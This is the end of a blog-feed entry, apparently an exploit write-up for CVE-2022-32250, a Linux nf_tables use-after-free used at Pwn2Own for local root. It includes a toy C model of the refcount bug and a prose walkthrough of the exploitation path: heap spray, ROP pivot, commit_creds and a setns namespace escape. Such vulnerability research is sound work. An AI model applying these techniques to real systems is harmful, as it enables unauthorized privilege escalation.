                                        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                                        <span class="k">struct</span> <span class="n">nft_set_elem</span> <span class="o">*</span><span class="n">elem</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_ext</span> <span class="o">*</span><span class="n">ext</span> <span class="o">=</span> <span class="n">nft_set_elem_ext</span><span class="p">(</span><span class="n">set</span><span class="p">,</span> <span class="n">elem</span><span class="o">-&gt;</span><span class="n">priv</span><span class="p">);</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">nft_set_ext_exists</span><span class="p">(</span><span class="n">ext</span><span class="p">,</span> <span class="n">NFT_SET_EXT_DATA</span><span class="p">))</span>
                <span class="n">nft_data_release</span><span class="p">(</span><span class="n">nft_set_ext_data</span><span class="p">(</span><span class="n">ext</span><span class="p">),</span> <span class="n">set</span><span class="o">-&gt;</span><span class="n">dtype</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nft_set_ext_exists</span><span class="p">(</span><span class="n">ext</span><span class="p">,</span> <span class="n">NFT_SET_EXT_OBJREF</span><span class="p">))</span>
                <span class="p">(</span><span class="o">*</span><span class="n">nft_set_ext_obj</span><span class="p">(</span><span class="n">ext</span><span class="p">))</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">--</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This means that after we successfully delete the set elem, the <code class="language-plaintext highlighter-rouge">nft_object</code> it is referencing has a use count of 0, and we can delete it by sending an <code class="language-plaintext highlighter-rouge">NFT_MSG_DELOBJ</code> netlink message, which invokes <code class="language-plaintext highlighter-rouge">nf_tables_delobj</code> to delete the object. This leaves us with an <code class="language-plaintext highlighter-rouge">objref</code> expression pointing to a freed slot that we can now fill with arbitrary data specified by an <code class="language-plaintext highlighter-rouge">nft_chain</code>’s userdata.</p>
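<p>The reference-count imbalance described above can be illustrated with a toy userspace model. Nothing here is kernel code: the <code class="language-plaintext highlighter-rouge">toy_*</code> names are hypothetical, and the model only tracks the <code class="language-plaintext highlighter-rouge">use</code> counter to show why the stale set elem makes the second delete succeed while the <code class="language-plaintext highlighter-rouge">objref</code> still holds its pointer.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdbool.h&gt;
#include &lt;stddef.h&gt;

/* Toy stand-in for nft_object: only the fields the argument needs. */
struct toy_obj {
        unsigned int use;
        bool freed;
};

/* Creating an objref expression takes a reference on the object. */
void toy_objref_bind(struct toy_obj **expr_slot, struct toy_obj *obj)
{
        *expr_slot = obj;
        obj-&gt;use++;
}

/* Flushing a set elem drops the reference it believes it holds. */
void toy_setelem_flush(struct toy_obj *stale_ptr)
{
        stale_ptr-&gt;use--;
}

/* Deleting an object is refused while it is still in use. */
int toy_delobj(struct toy_obj *obj)
{
        if (obj-&gt;use &gt; 0)
                return -1;
        obj-&gt;freed = true;
        return 0;
}

/* Returns 1 if the objref ends up pointing at a freed object. */
int toy_scenario(void)
{
        struct toy_obj obj = { .use = 0, .freed = false }; /* sprayed into the UAF slot */
        struct toy_obj *expr = NULL;

        toy_objref_bind(&amp;expr, &amp;obj);   /* use: 0 -&gt; 1 */
        if (toy_delobj(&amp;obj) == 0)      /* direct delete must be refused */
                return -1;
        toy_setelem_flush(&amp;obj);        /* stale set elem: use 1 -&gt; 0 */
        if (toy_delobj(&amp;obj) != 0)      /* delete now succeeds */
                return -2;
        return (expr == &amp;obj &amp;&amp; obj.freed) ? 1 : 0;
}
</code></pre></div></div>

<p>In the model, the set elem never took the reference it later drops on this object, which is exactly the imbalance that lets the object be freed while the expression still points at it.</p>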

<h3 id="rop-chain-execution-and-namespace-re-association">ROP chain execution and namespace re-association</h3>

<p>A point to note is that the <code class="language-plaintext highlighter-rouge">objref</code> expression belongs to an <code class="language-plaintext highlighter-rouge">nft_rule</code>, and that rule is added to a basechain in <code class="language-plaintext highlighter-rouge">nf_tables</code>. A basechain is registered with a netfilter hook (in our case we set it to be an output hook), so it acts as a filter for the system’s outgoing packets: the rules in that chain are used to process the traffic. In order to actually trigger the ROP chain, we just have to send a UDP datagram using the <code class="language-plaintext highlighter-rouge">sendto</code> syscall. This will result in <code class="language-plaintext highlighter-rouge">nft_do_chain</code> processing every expression in every rule for the chain, eventually invoking the <code class="language-plaintext highlighter-rouge">eval</code> function pointer (pointing to <code class="language-plaintext highlighter-rouge">nft_objref_eval</code>) on our <code class="language-plaintext highlighter-rouge">objref</code> expression. This triggers <code class="language-plaintext highlighter-rouge">obj-&gt;ops-&gt;eval</code> of the <code class="language-plaintext highlighter-rouge">nft_object</code> pointer stored in the <code class="language-plaintext highlighter-rouge">objref</code> expression. Recall that offset 128 from the start of the <code class="language-plaintext highlighter-rouge">nft_object</code> is where the <code class="language-plaintext highlighter-rouge">obj-&gt;ops-&gt;eval</code> function pointer is supposedly located. This means that if we spray <code class="language-plaintext highlighter-rouge">nft_chain</code>s, with ROP chain contents at the beginning of the chain’s <code class="language-plaintext highlighter-rouge">userdata</code> and offset 128 storing the starting address of the UAF slot, this will kick off execution of our ROP chain.
As the <code class="language-plaintext highlighter-rouge">eval</code> function is called with the <code class="language-plaintext highlighter-rouge">nft_object</code> (now replaced with chain <code class="language-plaintext highlighter-rouge">userdata</code>) itself as the first parameter, we can first perform a stack pivot in the ROP chain using a gadget similar to <code class="language-plaintext highlighter-rouge">push rdi; pop rsp; ret;</code>. In the rest of the ROP chain, the <code class="language-plaintext highlighter-rouge">init</code> process’ credentials are committed using <code class="language-plaintext highlighter-rouge">commit_creds(init_cred)</code> and <code class="language-plaintext highlighter-rouge">swapgs_restore_regs_and_ret_to_usermode</code> is used to cleanly return to usermode, with the RIP in userland pointing to a function in the exploit code responsible for escaping the namespace jails and spawning a shell. The namespace jails are escaped using the <code class="language-plaintext highlighter-rouge">setns</code> syscall (for instance <code class="language-plaintext highlighter-rouge">setns(open("/proc/1/ns/net", O_RDONLY), 0);</code>), which re-associates the given namespace of the process with that of the init process.</p>]]></content><author><name>kyeojy</name></author><category term="vulnerability" /><category term="exploitation" /><category term="linux" /><category term="kernel" /><category term="uaf" /><summary type="html"><![CDATA[This post explores the root cause and exploitation of CVE-2022-32250, a vulnerability I exploited for a successful demonstration at Pwn2Own Vancouver 2022, and also the first vulnerability I discovered. 
The issue was used to achieve local privilege escalation on Ubuntu 22.04 kernel 5.15.0-30-release.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://kyeojy.github.io/assets/og-image.png" /><media:content medium="image" url="https://kyeojy.github.io/assets/og-image.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry></feed>